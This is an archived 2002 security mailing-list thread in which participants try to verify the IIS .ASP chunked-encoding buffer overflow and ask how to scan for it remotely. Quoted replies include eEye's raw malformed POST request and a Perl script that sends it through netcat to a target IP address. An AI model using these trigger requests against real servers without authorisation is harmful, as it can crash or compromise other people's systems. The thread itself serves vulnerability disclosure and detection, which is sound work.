RE: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow

From: MadHat (madhatat_private)
Date: Fri Apr 12 2002 - 11:43:36 PDT

  • Next message: damdum: "RE: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow"

    Thanks, but I must have missed where the 100 continue return code was
    the defining factor of vulnerability.
    
    I can get this to return, but I have no way to verify vulnerability that
    I can see.  The original description released by Marc said that a popup
    appeared and that a message was entered in the Application Event log. 
    Since I can not reproduce either of these symptoms, how do I verify
    vulnerability.  If I send the same data as below to a patched host, it
    still comes back with the 100 continue return code.
    
    Oh and on the locked up I mentioned before, I meant that HTTP session
    locked, not IIS itself.  Not something I can count on, since it didn't
    seem to happen every time and did not seem to produce any of the signs
    noted in the advisory.
    
    
    On Fri, 2002-04-12 at 12:52, damdum wrote:
    > It should be noted that the request must be properly formatted (not sloppy),
    > this means using CRLF not just LF.  Here is a quick perl proggy:
    > 
    > use IPC::Open2;
    > 
    > $pid = open2(\*IN, \*OUT, "nc -nv 10.10.10.69 80");
    > 
    > print OUT "POST /iisstart.asp HTTP/1.1\r\n".
    >     "Accept: */*\r\n".
    >     "Host: victom.com\r\n".
    >     "Content-Type: application/x-www-form-urlencoded\r\n".
    >     "Transfer-Encoding: chunked\r\n".
    >     "\r\n".  
    >     "10\r\n".
    >     "PADPADPADPADPADP\r\n".
    >     "4\r\n".   
    >     "DATA\r\n".
    >     "4\r\n".   
    >     "DEST\r\n".
    >     "0\r\n";
    > 
    > $buff = <IN>;
    > if($buff =~ /HTTP\/1\.1 100 Continue/)
    > {
    >     print "Got HTTP 100 Continue, sending returns...\n";
    >     sleep 1;
    > 
    >     print OUT "\r\n\r\n\r\n";
    >     print OUT "\r\n\r\n\r\n";
    > 
    >     print "Done\n";
    > }   
    > else
    > {
    >     print "Hrmm, didn't find HTTP 100 Continue, bye.\n";
    > }
    > 
    > close IN; 
    > close OUT;
    > 
    > 
    > -- 
    > damdum
    > 
    > 
    > Quoting MadHat <madhatat_private>:
    > 
    > > I have not been able to reproduce these results.  I have managed to lock
    > > up IIS (IIS 5.0 with all patches pre Apr 1, 2002), but no popup messages
    > > appear and no entries in the Application Log.  I have also been able get
    > > the 100 Continue message (IIS 4.0 all patches pre Apr 1, 2002), but
    > > still no popup or messages.
    > > 
    > > Is there a reliable way to scan for these vulnerabilities remotely?
    > > 
    > > On Thu, 2002-04-11 at 11:25, Erik Parker wrote:
    > > > JM> Anyone have a proof of concept for this exploit?
    > > > 
    > > > eEye included some. Use this with "netcat" or "telnet"
    > > > 
    > > > replace [enter] with an actual pressing of your enter key (look at the
    > > > bottom, you can cut n paste)
    > > > 
    > > > It should return something like this, if it worked (and generate a popup
    > > > error to you that says "Unknown has generated errors")
    > > > 
    > > > HTTP/1.1 100 Continue
    > > > Server: Microsoft-IIS/5.0
    > > > Date: Wed, 27 Mar 2002 23:37:32 GMT
    > > > 
    > > > If it fails, it'll say something like:
    > > > 
    > > > HTTP/1.1 500 Server Error
    > > > Server: Microsoft-IIS/5.0
    > > > 
    > > > 
    > > > The application log will say:
    > > > 
    > > > Active Server Pages service has started
    > > > Access performance data was denied to IWAM_netbiosname as attempted from
    > > c:\WINNT\SYSTEM32\Drwtsn32.exe
    > > > 
    > > > 
    > > > **************Begin Session****************
    > > > POST /iisstart.asp HTTP/1.1
    > > > Accept: */*
    > > > Host: eeye.com
    > > > Content-Type: application/x-www-form-urlencoded
    > > > Transfer-Encoding: chunked
    > > > 
    > > > 10
    > > > PADPADPADPADPADP
    > > > 4
    > > > DATA
    > > > 4
    > > > DEST
    > > > 0
    > > > [enter]
    > > > [enter]
    > > > **************End Session******************
    > > > 
    > > -- 
    > > MadHat at Unspecific.com
    > > gpg --keyserver wwwkeys.us.pgp.net --recv-keys 9DDC3E98
    > > Key fingerprint = E786 7B30 7534 DCC2 94D5  91DE E922 0B21 9DDC 3E98
    > > 
    > > 
    > 
    -- 
    MadHat at Unspecific.com
    gpg --keyserver wwwkeys.us.pgp.net --recv-keys 9DDC3E98
    Key fingerprint = E786 7B30 7534 DCC2 94D5  91DE E922 0B21 9DDC 3E98
    



    This archive was generated by hypermail 2b30 : Fri Apr 12 2002 - 14:13:02 PDT